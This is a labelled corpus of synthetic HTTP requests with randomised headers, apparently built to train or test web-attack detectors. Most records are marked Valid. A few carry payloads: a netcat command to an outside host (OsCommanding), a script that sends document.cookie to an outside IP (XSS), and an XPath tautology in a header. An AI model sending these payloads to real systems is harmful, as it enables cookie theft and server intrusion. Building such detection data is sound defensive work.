Proxy-Authorization: Digest opaque="iotins1t"
Referer: http://www.apie.de/lnr2diu/05een/o4a6can/doon/ayedp.tiff
TE: gzip;q=0.9,trailers
User-Agent: thbdhst
Via: 2.7 18.154.175.216:67032, 0Olct/1.3 www.bt8n4i.jpeg, FTP/8.8 www.ejen9xtn.jpg

null

End - Id: 39515
Start - Id: 18417
class: Valid
GET /cde2iyemlnEasisi.cfm? HTTP/1.1
Host: www.sGav9Sr.com:30573
Connection: tlsh2en
Accept: text/plain;q=0.3, image/*;q=0.3, text/*;q=0.9
Accept-Charset: iso-8859-2;q=0.0, iso-8859-1;q=0.4, utf-7
Accept-Encoding: 
Accept-Language: r1hntmHc-renrnawn
Cache-Control: min-fresh=20283
Client-ip: 183.39.30.120
Cookie: sidtomrdricseme=am05pePpmSqn;nyaR5tp=li;s5nwBqczov9m=rhtaccesthdeleten9?r;o4nhyNhfssertv=ns7;tth=024722
Cookie2: $Version="641"
Date: Sun, 03 Oct 04 10:47:30 UTC
ETag: "LJ_RGNiXEZWFCKJz4mMH"
Expect: eeic
From: iorhw@fhlRqaapa.cz
If-Modified-Since: Mon, 10 Apr 06 01:04:25 GMT
If-Unmodified-Since: Fri, 01 Sep 06 02:39:40 UTC
If-Match: *
If-None-Match: *
If-Range: "xU2zh9ZxZm8jsTv"
Max-Forwards: 0094
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: Basic NHJudzp0YUNiZQ==
Range: 039-,2756-53,000-768
Referer: http://eluee.it/ybDeF/mow5/ed3i.cfm
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: eino3ppIezsshtqneLe
UA-CPU: MIPS
UA-Disp: 1388,0404,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 342x6218
Via: 3.0 133.104.193.88:953, 2.9 136.4.213.77, 9.5 39.88.132.203
Transfer-Encoding: identity
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 2956272403318008567
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18417
Start - Id: 24182
class: Valid
GET /eptocrC8stehra1/dK1a.1QG/nacZpIq/urnvEvjavutaRtTgs/yPUwinntV5iCin/eA.qeBgs.msf?J8WCaDfD=te+&fr1bqaahqN=7594601&7ielRt=3444065568&afwnqD=45&0iiouepcp=ihdp&8WSJuacceptTK_=l%2Ft&connectgzO=jdoiGneaidrg&slseeyiAC3a=ee%5Cmochakm&Oet=telnetprjttean4&aJg.=yAOvp HTTP/1.0
Host: 75.19.200.55
Connection: keep-alive
Accept: application/*
Accept-Charset: koi8, iso-8859-8;q=0.5
Accept-Encoding: deflate;q=0.8, gzip;q=0.4
Accept-Language: *
Cache-Control: max-age=57094
Client-ip: 218.99.99.50
Cookie: an0Sa6=kM5;rlxoioau=837873330
Cookie2: $Version="26"
Date: Sun, 21 Mar 04 14:18:20 GMT
ETag: W/"Im8RvswVer9nk7sM"
Expect: syl4eApn
From: ayael@sasgerntqn.it
If-Modified-Since: Wed, 28 Sep 05 06:46:55 CET
If-Unmodified-Since: Sat, 25 Apr 09 02:09:05 UTC
If-Match: *
If-None-Match: "Pgb9RFhrSTADgXsatz"
If-Range: Sun, 23 Aug 09 16:52:37 GMT
Max-Forwards: 31
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: tiea eyfn=erdlElt
Authorization: NTLM dXNyaGQ0b25leWhlbmV0aHN4cnM1d2R0dHhvZ2l5YWFyd3R0dXZTcm9lYWY=
Range: 4511-,8-4214
Referer: /xEhrQ.mp3
TE: deflate;q=0.9,trailers
Trailer: Upgrade
User-Agent: t5reOtpored
UA-CPU: PowerPC
UA-Disp: 7755,8327,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 019x070
Via: 8.7 www.Oatunu.tiff
Transfer-Encoding: gzip
Upgrade: ees/5.3, ellt4t/5.4, hudaht/4.5, eEt/9.9, faaa/7.5
Warning: 657 123.20.5.4:871 "8eaaeyio" "Wed, 07 Jan 09 10:03:24 GMT"
X-Forwarded-For: 172.198.248.143
X-Serial-Number: 742584885345002527
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24182
Start - Id: 4364
class: Valid
PUT /rattcsgm.asmx? HTTP/1.0
Content-Length: 128
Content-Language: cs8oOei,h
Content-Encoding: gzip
Content-Location: http://www.Oema.cz/eihmoddu/ty2Ish.png
Content-MD5: cWk2bmh0ZXl0Y0hVdGljOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jul 05 22:41:25 CET
Last-Modified: Fri, 08 Jul 05 18:58:43 UTC
Host: www.fhavmsofLe.gov
Connection: pxnEea
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: S7dtitm='zisg'
Client-ip: 231.184.222.158
Cookie: ebc7dr5=na;4i7anaaiin=75865372;h@B78=hlebpewDzb;SkJhibtrhhRa=0ae baghdelete&ueeq
Cookie2: $Version="59"
Date: Sun, 01 Apr 07 15:59:23 GMT
ETag: W/"hdp9GDa89lAkNgLbU"
Expect: ltrttnWd=hnnQVx;g2NLt
From: jnot@4c0sdrce7h.fr
If-Modified-Since: Sat, 26 Mar 05 17:06:53 GMT
If-Unmodified-Since: Sat, 18 Aug 07 06:35:23 GMT
If-Match: "YDagT-ccM2b84G7Vf2"
If-None-Match: "QJU.7hyFc@FvynOBnuc"
If-Range: Sat, 16 Apr 05 03:23:33 GMT
Max-Forwards: 80
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM dG1laDBlZThkMFNhdGhtaXRhZWIwbHFxZXRzMUNlbmRnYTNHclZyY3NoYWhpc3Rv
Authorization: NTLM ZGFhUDVybk9pbnRhaWwyYTNsZHlubW83dHJ1ZHRzdXljZXlyZWFoZWk=
Range: 8-5728,5-967,67441-616423
Referer: /aiehsr/7etonetO.htm
TE: deflate
Trailer: Expect
User-Agent: Mozilla/2.6 (Windows; U; Win 9x 2.4; nz-tc; rv:8.7.3) Gecko/83028182
UA-CPU: x86
UA-Disp: 564,248,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 109x8284
Via: BoZo/6.7 120.105.192.229
Transfer-Encoding: p7re; sidssAie=aoevbo
Upgrade: qxoo/3.2, 9eer/3.9, 7jet8r/7.2, ratm/0.1, rSgl/5.7
Warning: 055 244.62.200.40:2 "0plu" 
X-Forwarded-For: 139.143.108.151
X-Serial-Number: 5443838
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

tewnhR3xee=3naRxiariee3etss9&tejbvnernte=esezslatdrdum&oiiMniEfe=uou/ii ai:ab;i<window.open&gnauglg=o&maafclE=9CdiYSqWGp

End - Id: 4364
Start - Id: 23010
class: Valid
GET /ooeEc7usohshiiiBr1/0ahle7l/vr0slketerh/zjyJJEO_QH-MHEphmHMe/hc9cnhmtoe/ex/nQtoHX/yeht.mspx? HTTP/1.0
Host: www.ubtaA0lo.org
Connection: llYtne
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 83.68.194.74
Cookie: te4cchvobtbagut=Cees;rsdtH=kaoF6fZO;reeSnqrbdhr=0aolboot.ininXlmadusbgza
Cookie2: $Version="29"
Date: Sun, 05 Jul 09 23:04:55 CET
ETag: "DH4D@c.p46C-WPHgl"
Expect: 100-continue
From: reCec@atistonN.com
If-Modified-Since: Fri, 09 Apr 10 23:51:13 GMT
If-Unmodified-Since: Sat, 15 Jul 06 13:07:49 CET
If-Match: "9yA2RPrkfM-qu4@ZgV"
If-None-Match: *
If-Range: Sun, 24 Jul 05 04:53:28 UTC
Max-Forwards: 7
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic bEVFYUx0THQ6ZWVobGVyOA==
Authorization: Digest uri=http://www.4s2dpdh.it/r2o4/XEhnbM/HHnnBne/hoebuc/w8ogkAan.jsp
Range: 46141-509,21195-,-1
Referer: http://otr1t.biz/drAetyr/onusibb.tiff
TE: trailers
Trailer: Accept-Charset
User-Agent: s9ofyfe
UA-CPU: MIPS
UA-Disp: 8779,521,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 465x0327
Via: e5an/6.9 222.200.211.120:3031, HTTP/9.3 www.orgua.jpeg:17
Transfer-Encoding: compress
Upgrade: 9p2tdD/2.8, aeolon/3.0, ieaa/7.4, clo/8.1
Warning: 590 www.opmscngj.html "lswlRodnknfotDgav" "Wed, 07 Apr 10 19:07:32 GMT"
X-Forwarded-For: 242.37.131.17
X-Serial-Number: 782598520003
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23010
Start - Id: 43108
class: OsCommanding
GET /o4PbgTz.css?7mSRuefkhD=494241&lniH=pCTxpJ0cTXbp&eIi2ea=Uri%26on&NOwnC60=eeyijm6cw&s8e=ei&tontgpyiaeetrt=558&_OSbzB=l8A6Lxtx&.sgQhw=ss+ee&orrd4rY=leui2tftre7&imochaNFxnVrLz=%250a++nc+++www.gesteltrse.com++80++++%3B HTTP/1.0
Host: 62.75.234.3
Connection: close
Accept: */*;q=0.2
Accept-Charset: koi8-r;q=0.0, iso-8859-3, iso-10646-ucs-2;q=0.6, euc-tw;q=0.1, cp-932
Accept-Encoding: 
Accept-Language: hhse-sf
Cache-Control: only-if-cached
Client-ip: 246.16.85.161
Cookie: 5mXaHcricir=53;7N=aXwt;ryaWt=nmt8Wf;ipese=sraobq86a8mioIHGi;lertIodeweedb=xx8tunion;zeoer=ozKY4aVvbn
Cookie2: $Version="389"
Date: Mon, 02 May 05 18:25:14 UTC
ETag: W/"Q0dp4K9tAGu3DIBKEsFr"
Expect: 100-continue
From: OhAzntE@715eiieu6.uk
If-Modified-Since: Mon, 25 Sep 06 23:45:11 CET
If-Unmodified-Since: Mon, 30 Aug 04 05:38:48 GMT
If-Match: "mxBP9BG8Ob6JSSZId"
If-None-Match: *
If-Range: *
Max-Forwards: 739
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: iwt7 3rBen=urehn5nI
Authorization: Digest nonce
Referer: http://hnd0tSoi.st/CapnaoiI/rgsYpm/ab4aa.php
TE: trailers,chunked;q=0.0
Trailer: Connection
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 4.3; 8e-td; rv:3.3.1) Gecko/73435835
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Pixels: 2923x7442
Via: 7.3 www.eta40r.tiff, rue0ft/9.6 www.l7uxo.gif
Transfer-Encoding: gzip
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43108
Start - Id: 34858
class: Valid
POST /a9/RmrqeyiEm/sFgunionmV/eucbyZwZIQJeeUGOEKCq/MectOdt52eot/eA-pF5/uTCns09t/aE@RVqBExge9/nO4y@@tn@5Wa/eZPPc65LVyFcp.php3? HTTP/1.1
Content-Length: 228
Content-Language: cil,i8mieibr,ols
Content-Encoding: compress
Content-Location: /7miohse8/iseq/sids.mdb
Content-MD5: N2lla2hxbW90bHJocnpuZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Aug 05 22:57:44 GMT
Last-Modified: Sat, 02 Dec 06 17:52:39 UTC
Host: www.yrevlhwU.uk:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: koi8;q=0.9, iso-2022-kr;q=0.3, cp-950
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: max-age=929
Client-ip: 231.108.110.86
Cookie: soiti=86259399;hjek=i] e
Cookie2: $Version="00"
Date: Sat, 24 Oct 09 13:53:13 GMT
ETag: "mHMUMG.8nUPnsu0dn"
Expect: snidzhOr=haox;Gawrpse
From: Jnyui@7erErt.cz
If-Modified-Since: Sat, 04 Apr 09 16:50:24 GMT
If-Unmodified-Since: Fri, 11 Jan 08 15:42:39 GMT
If-Match: "6iU2lGWTCbbV8DLi"
If-None-Match: "sJeCc1BQf7KD7cNs"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.9
Pragma: ods77ac=q5wn
Proxy-Authorization: piRse 36rh0obt=bannf
Authorization: Basic ZWM3TGk6ZHR1dW9j
Range: -00,9-5046
Referer: http://fhrOoo.gov/eiYgeC.gz
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: tafknneeb/0.6.2
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-Pixels: 867x132
Via: FTP/2.9 www.acawar.shtml, FTP/4.9 170.188.57.138:573, 8.3 www.loya3lt.shtml
Transfer-Encoding: identity
Warning: 252 52.60.83.67 "gsw0us7t70cfreiHw" "Fri, 06 Aug 04 01:07:38 CET"
X-Forwarded-For: 235.64.29.202
X-Serial-Number: 26564430456596
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

o7aSfrom@wNQfo=at2eo&fRs4DwV.PVZE=l0esesomalz]o1&qfMxf5ZER=tNER5KgiiT&aeendt=493145&xzehanlok3=52864&Ocqce8leewnfddz=tao)&ik6Bzps9h3=51&OBm13BKRhhy=)&bh9hkeds9t=rruf&ot7u3ofdalhee=5035540184&4hOu2eft0rcr7=nn&goO.Yphp.YE@=1

End - Id: 34858
Start - Id: 47530
class: XSS
GET /s0wca/.EZTERqy7nbCcopy/jzeDjyXGLahM5Zh/hH1Aj2az/ti3oegeEfeeSiopeqdm/iay3QBZcDJhhsWBmULy8/mcashtnpts.php4?rFrhvcnps=l55ZY&di=m1%3Ftguonth&n0e6r1mh=9var&7pjkrreaf3s=sgedwLla5tt+usu&O-Bjacmd=%26%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F217.22.97.170%2Ftete.swf%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E HTTP/1.0
Host: 97.195.175.56
Connection: twisai
Accept: application/rtf, text/*, text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1
Accept-Language: luT5eiek-uslTteYe, 1Nas-SelFne, ponhdio-dtc;q=0.5
Cache-Control: no-store
Client-ip: 3.105.200.122
Cookie: dIJtmpWLZZWLi=ssR68YM5tr;nLform4Bo=enullal call+mrnesetcwlo
Cookie2: $Version="17"
Date: Sat, 01 May 10 17:24:17 CET
ETag: W/"JkgsIoaRszITfEp5ITc"
Expect: mAnknsm
From: joriiba@lmnuoAbu.de
If-Modified-Since: Wed, 21 May 08 05:10:26 CET
If-Unmodified-Since: Mon, 04 Oct 04 17:49:56 GMT
If-Match: "JB@tTM7-v87QCR89Sz_"
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 5
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM dWVKZW42Uml3cGhOYWhhbzdrbnRvZWFub1A4aTRhcmlhdQ==
Authorization: NTLM cGx0eWVzcG1oeW1uenNkRmFpY2VuYW9NZ2FibHNjZmlodDJEZmhlb2VvYW5lb0Vo
Range: 924-,916951-
Referer: /kcmmtd/totetcdt/Ueeah.doc
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/5.5 (Windows; U; Win 9x 2.8; ed-ha; rv:6.3.5) Gecko/79563656
UA-CPU: MIPS
UA-Disp: 050,2452,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: 7.3 www.dRrear.jpg, FTP/8.5 44.228.128.59, 5.5 www.rtnuovo.js
Transfer-Encoding: gzip
Upgrade: atsa/8.3
Warning: 720 www.pHaeee.js "Emolsthe" "Thu, 01 Jul 04 14:53:32 UTC"
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47530
Start - Id: 26199
class: Valid
GET /2zJ-WDvmq/esr1wdRsopmlRdtsj/rOSNy/ou/f4Pdivlike9VN5Bbody7/5YPszRYHjDh3kE@cX/edrop_spGY3Zj/rsAG3F4.-@Mk-cB.v/xEyug6k/@6_GvN/eheslhan/aU.cgi?Oz=80447&nt=g5ywTq%4071cKS&eup7fllawhl=clia3eeotis&rm00eedl5=aS0ao HTTP/1.1
Host: www.Dtta.net
Connection: keep-alive
Accept: video/quicktime;q=0.3, application/*, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aeteH-0;q=0.0, stntl-2t6, wusa4m-Rru, iAT0d-s, hPuNp6n-u
Cache-Control: max-stale
Client-ip: 200.48.13.171
Cookie: ENtDEvq=tpAabyemscvz;eFaI=m7noIci;tosifeo=aCGTKx0ueLr;88H1w=de;70r=7aayHtb
Cookie2: $Version="79"
Date: Mon, 26 Jul 04 17:10:44 GMT
ETag: W/"74qcydJtkIPRA2C"
Expect: 100-continue
From: pellmb@ooesR8dnrt.de
If-Modified-Since: Sat, 04 Apr 09 21:21:23 UTC
If-Unmodified-Since: Tue, 03 Oct 06 11:33:23 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Jan 06 19:03:17 GMT
Max-Forwards: 267
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: NTLM aHdlcjlvb21obXFsYm9FaG55dEU3ZWNydGFhbGJlbjFleWQ=
Range: 863391-,79-36
Referer: http://www.xyeSpa.it/osFq0.mdb
TE: chunked,trailers,trailers
Trailer: If-None-Match
User-Agent: lIkYaYzskZ http://www.r27yj.be
UA-CPU: x86
UA-Disp: 9152,7332,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0211x5802
Via: 0.9 www.nak0.shtml, 7.1 34.37.123.125:8450, HTTP/6.0 12.10.240.30
Transfer-Encoding: identity
Upgrade: Ugc/5.5, os3ld/5.5
Warning: 072 www.cUEomj7n.html:46118 "aodn" "Sun, 21 Jun 09 18:25:54 CET"
X-Forwarded-For: 108.88.117.150
X-Serial-Number: 2106773576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 26199
Start - Id: 1720
class: Valid
GET /7habcn/ftpTstrzgpSnUY.dll? HTTP/1.1
Host: 176.111.134.42
Connection: keep-alive
Accept: image/jpeg;q=0.6, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 132.252.121.152
Cookie: rs8Et=xneilniewti;eyefo=fitr;F-Dh=a$/aeeand??arkUusr\;hriwwMn=ocM0Ox8ees(
Cookie2: $Version="9"
Date: Sun, 01 Feb 04 10:10:48 CET
ETag: "LqP66AJ3sj.doSbglm"
Expect: 100-continue
From: TIEro@eoeN.uk
If-Modified-Since: Fri, 25 Apr 08 24:33:03 CET
If-Unmodified-Since: Fri, 09 Sep 05 19:08:48 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Jun 07 11:28:42 GMT
Max-Forwards: 1
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic ZXBldG1iOnBpYXM=
Authorization: NTLM cmFuc2NtM29uV2FndDViMWlvMmVuMWh6YWh0aG1vbmpvdGRvaGg=
Range: 6-9
Referer: /tezekeer/msNeesgp/DoujT0eg/amplgL.msf
TE: trailers
Trailer: Date
User-Agent: Mozilla/8.1 (compatible; potsi; Win 9x; lgip; f6qyienge)
UA-CPU: 68000
UA-Disp: 6638,4343,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6206x0801
Via: HTTP/2.7 www.nfjrto.tiff:219
Transfer-Encoding: lrtw
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 634106000415144
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1720
Start - Id: 16262
class: Valid
GET /tCXZR764dwuuIFY/pjhoaetsoih5e/rB.5w/3EnlsJOWYWZPcHnTi2.js?Qspeafmt=9851313&gr=s0hd%25%3Aejselecttqo&5orntrtT0atmy=winnts4nsu32+2cnh0%7Ce+5em HTTP/1.1
Host: 108.141.12.2
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity, identity;q=0.2
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 252.250.241.161
Cookie: hvCperlXshutdownH=2ase
Cookie2: $Version="1"
Date: Sat, 14 Jan 06 11:06:29 UTC
ETag: "CXANZw0Rk-KOgM1Jc6X."
Expect: 100-continue
From: 5oSecmlh@N6omaecn.biz
If-Modified-Since: Thu, 28 Dec 06 15:12:59 CET
If-Unmodified-Since: Wed, 28 Jun 06 21:23:40 GMT
If-Match: "6ywM@.IODDCaflNmM"
If-None-Match: *
If-Range: *
Max-Forwards: 435
MIME-Version: 2.6
Pragma: R=riweishs
Proxy-Authorization: 5n2tO hog8=baay
Authorization: chiiu p5rnnt=nlui
Range: 767-,-23616
Referer: http://www.7mwsxnh.gov/rifx.php
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: tBzqHK http://www.96aiipa.gov
UA-CPU: 68000
UA-Disp: 7368,0111,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2602x876
Via: 8tsyst/3.8 65.7.250.16
Transfer-Encoding: compress
Upgrade: pno/2.0, 92s3t/7.4, hio/3.0
Warning: 593 www.czyane.jpg "hnn6i2Nors" "Sun, 24 Jun 07 01:56:04 GMT"
X-Forwarded-For: 182.148.242.42
X-Serial-Number: 1613720445559
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16262
Start - Id: 18271
class: Valid
GET /f4gN7pvQAJI4yGzmuQ5/w8Q.Ad14/PIqeVkibZ0dH/aVFYDuf_1ZCPf3m8GgsK/-tIcl58TG%upvar/4FWMNdfU/1ZYVD9PTj.html?nit=e%3F&emraw=03454671&tApassthruvbscriptXlinkV2q=redeK&8Y28=cahnaf3gEqd6Htro HTTP/1.0
Host: 76.35.92.213
Connection: keep-alive
Accept: audio/basic
Accept-Charset: euc-tw;q=0.1, utf-7;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: exrdi='atrFC'
Client-ip: 62.229.5.206
Cookie: dcf=oTa
Cookie2: $Version="885"
Date: Thu, 12 Oct 06 16:03:29 GMT
ETag: W/"gA5TPxjX67hHpLoXl@v"
Expect: 8ornd
From: tAienyay@xtgc.gov
If-Modified-Since: Sun, 16 Nov 08 11:24:15 CET
If-Unmodified-Since: Wed, 01 Jun 05 17:13:01 UTC
If-Match: "zWpjP9nRX2yQfZFNoS5b"
If-None-Match: *
If-Range: "EC1N7.LZgLlWy5QJ6A"
Max-Forwards: 894
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: Digest username="at1j"
Range: -043,7-,317257-
Referer: /etKn3u8/dflsN/hrLghil/aicehahe/ftacalnE.cfm
TE: trailers,chunked;q=0.8,gzip
Trailer: Authorization
User-Agent: Mozilla/5.9 (compatible; ieetiib; Mac OS X; wafe; iuil; exzTljBnl)
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 364x686
Via: 6.0 www.rdean.htm, 4.2 240.75.255.62
Transfer-Encoding: identity
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 364 5.11.203.107 "otm7lanyas" 
X-Forwarded-For: 210.2.25.150
X-Serial-Number: 561642112
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18271
Start - Id: 2738
class: Valid
GET /9i/r9QyImL-LWUa65Ig_c/ndV5KCVZCbTte.3T-G1/bmw55bw_M/9payj/n2YQwIoIz.quWi/sDzddjmcupcYhC@ks/xeUob/PMEXZjLCJ72cat/zuntTekrt5irdosi6Yi/2Qmn/2eyindtktrhiausaiP9r.png?ireraiaarlepfwf=nT&at=7nAp&XbHrYbnweake=df3cq5&bettfxne0oge=no0sn5hieirurw&dOBO3=sgacgt3%28eoa7eia9&lsdsn=40&iorxhahbhndee=dcr9t%29&awhp3hnAt7nlIe=u%29Sr+&Ai28YvXxp_A-k=fuSXvBFMKe51&itgvS=6 HTTP/1.0
Host: www.Ao3jeeoAW.cz:1
Connection: o7j6
Accept: text/plain
Accept-Charset: iso-8859-4, windows-1251
Accept-Encoding: deflate
Accept-Language: er-lmc
Cache-Control: ve=deP2
Client-ip: 0.74.23.133
Cookie: Et=28922;xote=04483;liv15ce9=tddchh3ec;sib4mam=0955;tdsr=mPoG_.jx_;Icvsheetei=n$perl eN~t\a
Cookie2: $Version="32"
Date: Wed, 23 Nov 05 18:36:12 CET
ETag: "A0y4waR8Yq4Jcqlj71eN"
Expect: u70trk
From: dasa@Cnth.cz
If-Modified-Since: Fri, 05 Mar 04 17:54:45 CET
If-Unmodified-Since: Tue, 19 Jun 07 22:22:19 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Oct 06 04:56:32 UTC
Max-Forwards: 990
MIME-Version: 3.1
Pragma: ERO7d=mhefM1
Proxy-Authorization: gsem9 fnpyn=nemsen
Authorization: Basic cGR0bmQ6YmxvZmNjcA==
Range: 8-,-0,6-
Referer: http://eoHTeers.uk/leasn/etapknoj/FOjAgci/a39g/2e0do.cfm
TE: trailers
Trailer: From
User-Agent: Mozilla/1.2 (Machintosh; U; PPC Mac OS X 0.3; oi-aR; rv:4.8.2) Gecko/63940715
UA-CPU: StrongARM
UA-Disp: 599,0261,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9002x158
Via: 4.2 221.174.130.68:427
Transfer-Encoding: deflate
Upgrade: ltniik/7.5, 1Ntcmo/9.7
Warning: 048 www.yigv.gif "cdtfsiao" "Mon, 13 Oct 08 01:16:56 UTC"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2738
Start - Id: 48369
class: XPathInjection
GET /55q7UKf157duEq_Th/optcmduKVUz/eG_e-JelPlXCRfrHoWo/xZfn3xHn0wP1CpHU/WZRO/e9Vp6ji/m19/bKbS/nrni0ryccTIpfseieei/tdisseYfa8tnetNcp/Rcig.jpeg?ttxta511eklssz=743&ropIlteireu=xen3dsjol&eertEejonhlne=h-9S%40&veswPtztooegnmd=ShgrttrD&uQOl=a&sh7txiEt=iUTR-h&oovaOsgd=sd&eeselhtklvse=t2E2Rxgjcu&dotEscot=aHHZAaM.Y0n&crToedehloratT=wdehf%26%3Dincludenoor&Np=c96E%27zgroup+by%3C&idsnintis0su=68183&LplgQ=Izhc&Uoo=aj_mH&woftrahqSzA=777163 HTTP/1.0
Host: www.btteeod.com:80
Connection: close
Accept: image/png;q=0.2, image/png;q=0.4, text/*
Accept-Charset: x-mac-arabic;q=0.4, koi8, isiri-3342, macintosh;q=0.7
Accept-Encoding: o4'    or  1< e/sa4/eac/child::text()[position()=612]    or  'lt'   =   '
Accept-Language: 8-sfet, 4mpunt-6ynrin;q=0.8
Cache-Control: lf=w
Client-ip: 127.253.106.46
Cookie: WIQandutelnet=5262;tfuesetnnes=r2rled1Vceiaeise;hethn=rooebai9pbmacbCiet;ersgb=hdEWrTcopyeeat;90GacceptVdpUMm=hEFLdA0-RGAi
Date: Tue, 22 Jun 04 07:41:13 UTC
ETag: "NYR8UqwqlTgjYhohloi3"
Expect: HetkQ=ev2xa
From: s5al6B3@ostl.it
If-Modified-Since: Fri, 29 May 09 14:02:28 CET
If-Unmodified-Since: Tue, 05 Jun 07 21:14:19 UTC
If-Match: "lat4Vj7FALxclsVQc"
If-None-Match: *
If-Range: Tue, 23 Jun 09 19:44:42 UTC
Max-Forwards: 2681
MIME-Version: 1.1
Pragma: lf=s
Proxy-Authorization: 5rEtt zyep=iae9id
Authorization: NTLM c2EyZWxnbmFvbGtsZmFrZWN1ZW1jYWVlZWVpcjBvTEFC
Range: -101,-0,2257-
Referer: /ak3Ete/ysh4qou/pDtg6m/anels6u/PmvhR2.mpg
TE: trailers,trailers
Trailer: User-Agent
User-Agent: s7AbRWW http://www.toaiss.de
UA-CPU: 68000
UA-Pixels: 516x4086
Via: HTTP/6.5 www.syguecyb.css, FTP/6.5 132.197.45.30
Transfer-Encoding: mulp
Upgrade: osanot/5.5
Warning: 920 242.150.132.18 "hesjsoctncttlo" "Wed, 13 Jan 10 09:05:54 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48369
Start - Id: 22702
class: Valid
